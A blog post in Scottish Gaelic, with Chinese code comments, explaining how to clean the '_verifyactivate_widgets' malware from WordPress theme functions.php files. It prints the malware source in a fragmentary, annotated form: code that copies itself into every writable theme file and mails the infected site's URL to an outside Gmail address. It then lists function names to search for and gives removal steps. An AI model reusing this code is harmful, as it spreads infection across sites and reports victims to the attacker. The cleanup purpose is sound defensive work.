Mar a ghlanas cuspairean WordPress còd droch-rùnach _verifyactivate_widgets

o chionn ghoiridChen Weilianga ’cleachdadh an-dràstaBidh plugan tèarainteachd Wordfence Security a’ sganadh làraich-lìn airson còd droch-rùnachÀs deidh sin, chaidh a lorgWordPressAnn am faidhle function.php an cuspair, tha an còd bhìoras droch-rùnach falaichte.

Còd droch-rùnach ann am faidhle functions.php cuspair WordPress

Mar a ghlanas cuspairean WordPress còd droch-rùnach _verifyactivate_widgets

Is e an t-àite as coltaiche airson “còd droch-rùnach” ann an WordPress function.php anns an eòlaire cuspair, mar as trice falaichte aig deireadh an fhaidhle function.php.

prìomh dhuilgheadas:Lorgaidh an còd droch-rùnach a bheil a h-uile cuspair fon bhlog gnàthach gabhaltach a h-uile uair a bhios cuideigin a’ tadhal air duilleag a’ bhlog agad. Mura h-eil, bidh iad air an galar còmhla.

Às deidh sin, nuair a thèid an gnìomh tòiseachaidh tòiseachaidh de wp a chuir gu bàs, nì e sgrùdadh a bheil am blog gnàthach air post-d a chuir chun bhogsa puist livethemas@gmail. com

Ciamar a bhios fios agad a bheil e air a phostadh?

  • Taobh a-staigh do bhòrd wp_options tha faidhle ris an canar_is_widget_active_roghainn, ma chaidh a chuir gu soirbheachail, suidhich a luach gu 1;
  • Mura h-eil, cleachd URL duilleag-dachaigh a’ bhlog air a bheil galair an-dràsta mar an tiotal agus an t-susbaint.
  • Sin e, chan eil droch rudan eile ri dhèanamh.

Tha an còd bhìoras droch-rùnach mar a leanas (is dòcha gu bheil eadar-dhealachaidhean ann, ach tha an còd bunaiteach mar an ceudna):

function _verifyactivate_widgets(){
//查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容
$output=strip_tags($output, $allowed);
//取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes
$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),“themes”) + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
if (stripos($cont,$ftion) === false){
//查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记
$comaar=stripos( substr($cont,-20),”?”.”>”) !== false ? “” : “?”.”>”;
//这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。
$output .= $before . “Not found” . $after;
//如果文件是以 ?> 标记结尾的,连标记一起取过来
if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);}
$output=rtrim($output, “\n\t”); fputs($f=fopen($item,”w+”),$cont . $comaar . “\n” .$widget);fclose($f);
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
return $output;
function _get_allwidgets_cont($wids,$items=array()){
if(substr($places,-1) == “/”){

if(!file_exists($places) || !is_dir($places)){
return false;
foreach ($elems as $elem){
if ($elem != “.” && $elem != “..”){
if (is_dir($places . “/” . $elem)){
$wids[]=$places . “/” . $elem;
} elseif (is_file($places . “/” . $elem)&&
$elem == substr(__FILE__,-13)){
//否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的
$items[]=$places . “/” . $elem;}
return false;
if (sizeof($wids) > 0){
return _get_allwidgets_cont($wids,$items);
} else {
return $items;

function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );

function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) );
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) );
return $pos;
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != “.” && $file != “..”) || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
return $dirArray;

add_action(“admin_head”, “_verifyactivate_widgets”);

function _getprepare_widget(){
if(!isset($text_length)) $text_length=120;
if(!isset($check)) $check=”cookie”;
if(!isset($tagsallowed)) $tagsallowed=”<a>“;
if(!isset($filter)) $filter=”none”;
if(!isset($coma)) $coma=””;
if(!isset($home_filter)) $home_filter=get_option(“home”);
if(!isset($pref_filters)) $pref_filters=”wp_”;
if(!isset($is_use_more_link)) $is_use_more_link=1;
if(!isset($com_type)) $com_type=””;
if(!isset($cpages)) $cpages=$_GET[“cperpage”];
if(!isset($post_auth_comments)) $post_auth_comments=””;
if(!isset($com_is_approved)) $com_is_approved=””;
if(!isset($post_auth)) $post_auth=”auth”;
if(!isset($link_text_more)) $link_text_more=”(more…)”;
if(!isset($widget_yes)) $widget_yes=get_option(“_is_widget_active_”);
if(!isset($link_text_more_ditails)) $link_text_more_ditails=”(details…)”;
if(!isset($contentmore)) $contentmore=”ma”.$coma.”il”;
if(!isset($for_more)) $for_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql=””;

//如果 _is_widget_active_ option内容为空,即表示没有被感染过
if (!$widget_yes) :

global $wpdb, $post;
// post_author 为 [email protected] 的文章,肯定是没有的

$sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND post_author=\”li”.$coma.”vethe”.$com_type.”mas”.$coma.”@”.$com_is_approved.”gm”.$post_auth_comments.”ail”.$coma.”.”.$coma.”co”.”m\” AND post_password=\”\” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if (!empty($post->post_password)) {
if ($_COOKIE[“wp-postpass_”.COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__(“There is no excerpt because this is a protected post.”);
} else {
if(!isset($fixed_tags)) $fixed_tags=1;
if(!isset($filters)) $filters=$home_filter;
//$gettextcomments实际上为 wp_mail
if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
if(!isset($tag_aditional)) $tag_aditional=”div”;

//这里$sh_cont即为 [email protected]
if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, “live”), 20);#
if(!isset($more_text_link)) $more_text_link=”Continue reading this entry”;
if(!isset($isshowdots)) $isshowdots=1;

if($fakeit == 2) {
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
//开始调用 wp_mail 向 [email protected] 发送邮件,标题和内容都是被感染的博客的URL 地址
$sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND comment_content=”. call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if($text_length < 0) {
} else {
if(!$no_more && strpos($text, “<span id=“more-5265”></span>“)) {
$text=explode(“<span id=“more-5675”></span>“, $text, 2);
} else {
$text=explode(” “, $text);
if(count($text) > $text_length) {
} else {
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . ” “;
update_option(“_is_widget_active_”, 1);
if(“all” != $tagsallowed) {
$output=strip_tags($output, $tagsallowed);
return $output;
$output=rtrim($output, “\s\n\t\r\0\x0B”);
$output=($fixed_tags) ? balanceTags($output, true) : $output;
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
//$filter 为 none …,又是在伪装
$output=apply_filters($filter, $output);
switch($tag_aditional) {
case(“div”) :
case(“span”) :
case(“p”) :
default :

if ($is_use_more_link ) {
if($for_more) {
$output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “#more-” . $post->ID .”\” title=\”” . $more_text_link . “\”>” . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : “” . “</a></” . $tag . “>” . “\n”;
} else {
$output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “\” title=\”” . $more_text_link . “\”>” . $link_text_more . “</a></” . $tag . “>” . “\n”;
return $output;

add_action(“init”, “_getprepare_widget”);

function __popular_posts($no_posts=6, $before=”<li>“, $after=”</li>“, $show_pass_post=false, $duration=””) {
global $wpdb;
$request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \”comment_count\” FROM $wpdb->posts, $wpdb->comments”;
$request .= ” WHERE comment_approved=\”1\” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\”publish\””;
if(!$show_pass_post) $request .= ” AND post_password =\”\””;
if($duration !=””) {
$request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “;
$request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”;
if ($posts) {
foreach ($posts as $post) {
$output .= $before . ” <a href=\”” . $permalink . “\” title=\”” . $post_title.“\”>” . $post_title . “</a> ” . $after;
} else {
$output .= $before . “None found” . $after;
return $output;

Dè a th’ ann an còd droch-rùnach cuspair WordPress?

Ma cho-dhùineas sganadh leis a’ plugan Wordfence Security gun deach bacadh a chur air an fhaidhle function.php agad, feumaidh tu sgrùdadh a dhèanamh, mar eisimpleir:

  1. _verifyactivate_widgets
  2. gnìomh _checkactive_widgets
  3. gnìomh _get_allwidgets_cont
  4. gnìomh stripos
  5. stripos gnìomh
  6. scandir gnìomh
  7. gnìomh _getprepare_widget
  8. gnìomh __popular_puist
  9. add_action ("admin_head", "_checkactive_widgets");
  10. add_action ("init", "_getprepare_widget");
  11. _dearbhaidh_isactivate_widgets
  12. _check_isactive_widget
  13. _get_allwidgetscont
  14. _ullachadh_widgets
  15. _puist_mòr-chòrdte
  • Tha gach loidhne neo-eisimeileach, ma tha an còd gu h-àrd agad anns na functions.php agad is dòcha gu bheil thu air do bhualadh.
  • Nam measg, tha gnìomhan agus add_action mar as trice còd “còd droch-rùnach” a bhuineas do “ghnìomhachd ullachaidh”.

Mar a bheir thu air falbh còd bhìoras droch-rùnach cuspair WordPress function.php?

Tha e cuideachd gu math sìmplidh a ghlanadh, dìreach lorg an còd coltach ris an fhear gu h-àrd ann am faidhle function.php cuspair WordPress agus cuir às dha, ach air sgàth aon uair ‘s gu bheil e air a ghlacadh, bidh a h-uile cuspair anns an eòlaire cuspair agad air a ghlacadh, mar sin dìreach an gnàthach Tha an cuspair a chaidh a chleachdadh mì-dhligheach agus thèid a chruthachadh goirid às deidh a ghlanadh.

Is e am fuasgladh còd bhìoras droch-rùnach aon chuspair WordPress a thoirt air falbh, am faidhle functions.php a shuidheachadh gu 444 cead, agus an uairsin na cuspairean WordPress eile a ghlanadh.

A thaobh a bheil feum air cead 444 den fhaidhle functions.php mu dheireadh atharrachadh air ais, tha daoine a’ moladh gu bheil 444 gu ìre mhath sàbhailte agus gun gabh atharrachadh nuair a bhios feum air.

Notaichean mu bhith a’ cleachdadh plugan Wordfence Security

Tha sinn a’ moladh am plugan WordPress le Wordfence Security, plugan tèarainteachd WordPress le balla-teine ​​​​amalaichte agus sganadh malware, air a thogail agus air a chumail suas le sgioba mòr a tha ag amas 100% air tèarainteachd WordPress.

Ged a tha modalan pàighte ann, is urrainn dhuinn am modal an-asgaidh “Scan” a chleachdadh gus an làrach WordPress againn a sganadh airson faidhlichean PHP anns a bheil “còd droch-rùnach”, ged a tha ìre dearbhach meallta ann (gu sònraichte cuid de plugins fìor, thèid am pàirt crioptachaidh cuspair a bhacadh. le rudan ceàrr), ach tha a bhith a’ lorg “còd droch-rùnach” gu cinnteach na bharrachd obrach le nas lugha oidhirp.

Bu chòir a thoirt fa-near nach eilear a’ moladh am plug-in seo a chuir air gu tric, oir bidh am balla-teine ​​​​agus an dìon tèarainteachd aige ag adhbhrachadh cuideam luchdan sònraichte air an stòr-dàta agus a ’toirt buaidh air coileanadh na làraich-lìn.

Mar as trice, bidh plugain comasach air sganaidhean “sgan” a ruith nuair a bhios feum orra.

Dùin am plug-in an dèidh don rannsachadh a bhith deiseil, ma tha èiginn ann.

An dòchas blog Chen Weiliang ( ) co-roinnte "Mar a ghlanas tu còd droch-rùnach _verifyactivate_widgets ann an cuspair WordPress", a tha cuideachail dhut.

Fàilte gus ceangal an artaigil seo a cho-roinn:

Fàilte don t-sianal Telegram de bhlog Chen Weiliang gus na h-ùrachaidhean as ùire fhaighinn!

🔔 Bi mar a’ chiad fhear a fhuair an “Stiùireadh Cleachdadh Inneal AI Margaidheachd Susbaint ChatGPT” luachmhor ann an eòlaire mullach an t-seanail! 🌟
📚 Tha luach mòr anns an stiùireadh seo, 🌟 Is e cothrom ainneamh a tha seo, na caill e! ⏰⌛💨
Roinn agus toil ma thogras tu!
Is e do roinneadh agus do rudan mar ar brosnachadh leantainneach!


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